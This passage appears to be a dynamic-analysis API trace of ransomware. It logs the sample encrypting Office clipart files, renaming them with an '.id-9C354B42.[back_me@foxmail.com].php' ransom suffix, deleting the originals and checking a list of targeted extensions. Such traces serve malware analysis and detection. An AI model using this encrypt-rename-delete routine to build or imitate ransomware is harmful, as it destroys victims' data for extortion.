Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0052.976] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif")) returned 1 [0052.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.977] lstrlenW (lpString=".doc") returned 4 [0052.977] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.977] lstrlenW (lpString=".docx") returned 5 [0052.977] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.977] lstrlenW (lpString=".pdf") returned 4 [0052.977] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.977] lstrlenW (lpString=".xls") returned 4 [0052.977] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.977] lstrlenW (lpString=".xlsx") returned 5 [0052.977] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.977] lstrlenW (lpString=".ppt") returned 4 [0052.977] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.977] lstrlenW (lpString=".zip") returned 4 [0052.977] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.977] lstrlenW (lpString=".rar") returned 4 [0052.977] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.977] lstrlenW (lpString=".bz2") returned 4 [0052.977] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.977] lstrlenW (lpString=".7z") returned 3 [0052.977] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.977] lstrlenW (lpString=".dbf") returned 4 [0052.977] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.978] lstrlenW (lpString=".1cd") returned 4 [0052.978] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.978] lstrlenW (lpString=".jpg") returned 4 [0052.978] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.978] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=7216) returned 1 [0052.978] CloseHandle (hObject=0x1a4) returned 1 [0052.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif")) returned 0x20 [0052.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0052.978] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.978] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.979] GetLastError () returned 0x0 [0052.979] ReadFile (in: hFile=0x1a4, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x1c30, lpOverlapped=0x0) returned 1 [0052.981] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x1c40, lpOverlapped=0x0) returned 1 [0052.982] ReadFile (in: hFile=0x1a4, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.982] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.982] SetEndOfFile (hFile=0x220) returned 1 [0052.983] CloseHandle (hObject=0x220) returned 1 [0052.983] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.983] SetEndOfFile (hFile=0x1a4) returned 1 [0052.984] CloseHandle (hObject=0x1a4) returned 1 [0052.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0052.984] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif")) returned 1 [0052.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.984] lstrlenW (lpString=".doc") returned 4 [0052.984] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.984] lstrlenW (lpString=".docx") returned 5 [0052.984] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.984] lstrlenW (lpString=".pdf") returned 4 [0052.984] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.984] lstrlenW (lpString=".xls") returned 4 [0052.984] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.984] lstrlenW (lpString=".xlsx") returned 5 [0052.984] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.985] lstrlenW (lpString=".ppt") returned 4 [0052.985] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.985] lstrlenW (lpString=".zip") returned 4 [0052.985] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.985] lstrlenW (lpString=".rar") returned 4 [0052.985] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.985] lstrlenW (lpString=".bz2") returned 4 [0052.985] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.985] lstrlenW (lpString=".7z") returned 3 [0052.985] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.985] lstrlenW (lpString=".dbf") returned 4 [0052.985] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.985] lstrlenW (lpString=".1cd") returned 4 [0052.985] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0052.985] lstrlenW (lpString=".jpg") returned 4 [0052.985] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.986] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=14873) returned 1 [0052.986] CloseHandle (hObject=0x1a4) returned 1 [0052.986] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif")) returned 0x20 [0052.986] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0052.986] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.986] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.987] GetLastError () returned 0x0 [0052.987] ReadFile (in: hFile=0x1a4, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x3a19, lpOverlapped=0x0) returned 1 [0052.989] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x3a20, lpOverlapped=0x0) returned 1 [0052.990] ReadFile (in: hFile=0x1a4, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.990] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.990] SetEndOfFile (hFile=0x220) returned 1 [0052.990] CloseHandle (hObject=0x220) returned 1 [0052.991] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.991] SetEndOfFile (hFile=0x1a4) returned 1 [0052.991] CloseHandle (hObject=0x1a4) returned 1 [0052.992] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0052.992] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif")) returned 1 [0052.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.992] lstrlenW (lpString=".doc") returned 4 [0052.992] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.992] lstrlenW (lpString=".docx") returned 5 [0052.992] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.992] lstrlenW (lpString=".pdf") returned 4 [0052.992] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.992] lstrlenW (lpString=".xls") returned 4 [0052.992] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.992] lstrlenW (lpString=".xlsx") returned 5 [0052.992] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.992] lstrlenW (lpString=".ppt") returned 4 [0052.992] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.992] lstrlenW (lpString=".zip") returned 4 [0052.992] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.992] lstrlenW (lpString=".rar") returned 4 [0052.992] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.993] lstrlenW (lpString=".bz2") returned 4 [0052.993] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.993] lstrlenW (lpString=".7z") returned 3 [0052.993] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.993] lstrlenW (lpString=".dbf") returned 4 [0052.993] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.993] lstrlenW (lpString=".1cd") returned 4 [0052.993] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0052.993] lstrlenW (lpString=".jpg") returned 4 [0052.993] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.993] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=6684) returned 1 [0052.993] CloseHandle (hObject=0x1a4) returned 1 [0052.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif")) returned 0x20 [0052.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0052.994] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.994] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.994] GetLastError () returned 0x0 [0052.994] ReadFile (in: hFile=0x1a4, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x1a1c, lpOverlapped=0x0) returned 1 [0053.223] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x1a20, lpOverlapped=0x0) returned 1 [0053.224] ReadFile (in: hFile=0x1a4, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.224] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.224] SetEndOfFile (hFile=0x220) returned 1 [0053.224] CloseHandle (hObject=0x220) returned 1 [0053.225] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.225] SetEndOfFile (hFile=0x1a4) returned 1 [0053.225] CloseHandle (hObject=0x1a4) returned 1 [0053.225] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.226] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif")) returned 1 [0053.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0053.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0053.226] lstrlenW (lpString=".doc") returned 4 [0053.226] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.226] lstrlenW (lpString=".docx") returned 5 [0053.226] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.226] lstrlenW (lpString=".pdf") returned 4 [0053.226] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.226] lstrlenW (lpString=".xls") returned 4 [0053.226] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.226] lstrlenW (lpString=".xlsx") returned 5 [0053.226] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.226] lstrlenW (lpString=".ppt") returned 4 [0053.226] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0053.226] lstrlenW (lpString=".zip") returned 4 [0053.226] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.226] lstrlenW (lpString=".rar") returned 4 [0053.226] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.227] lstrlenW (lpString=".bz2") returned 4 [0053.227] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.227] lstrlenW (lpString=".7z") returned 3 [0053.227] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0053.227] lstrlenW (lpString=".dbf") returned 4 [0053.227] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0053.227] lstrlenW (lpString=".1cd") returned 4 [0053.227] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0053.227] lstrlenW (lpString=".jpg") returned 4 [0053.227] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.351] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=3484) returned 1 [0053.351] CloseHandle (hObject=0x1bc) returned 1 [0053.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif")) returned 0x20 [0053.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0053.352] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.352] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.353] GetLastError () returned 0x0 [0053.353] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xd9c, lpOverlapped=0x0) returned 1 [0053.366] WriteFile (in: hFile=0x1c0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xda0, lpOverlapped=0x0) returned 1 [0053.368] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.368] WriteFile (in: hFile=0x1c0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.368] SetEndOfFile (hFile=0x1c0) returned 1 [0053.368] CloseHandle (hObject=0x1c0) returned 1 [0053.368] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.368] SetEndOfFile (hFile=0x1bc) returned 1 [0053.369] CloseHandle (hObject=0x1bc) returned 1 [0053.369] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.369] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif")) returned 1 [0053.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0053.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0053.370] lstrlenW (lpString=".doc") returned 4 [0053.370] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.370] lstrlenW (lpString=".docx") returned 5 [0053.370] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.370] lstrlenW (lpString=".pdf") returned 4 [0053.370] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.370] lstrlenW (lpString=".xls") returned 4 [0053.370] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.370] lstrlenW (lpString=".xlsx") returned 5 [0053.370] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.370] lstrlenW (lpString=".ppt") returned 4 [0053.370] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0053.370] lstrlenW (lpString=".zip") returned 4 [0053.370] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.370] lstrlenW (lpString=".rar") returned 4 [0053.370] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.370] lstrlenW (lpString=".bz2") returned 4 [0053.370] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.370] lstrlenW (lpString=".7z") returned 3 [0053.370] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0053.370] lstrlenW (lpString=".dbf") returned 4 [0053.370] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0053.370] lstrlenW (lpString=".1cd") returned 4 [0053.370] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0053.371] lstrlenW (lpString=".jpg") returned 4 [0053.371] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.371] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1146) returned 1 [0053.371] CloseHandle (hObject=0x1bc) returned 1 [0053.371] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif")) returned 0x20 [0053.371] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program 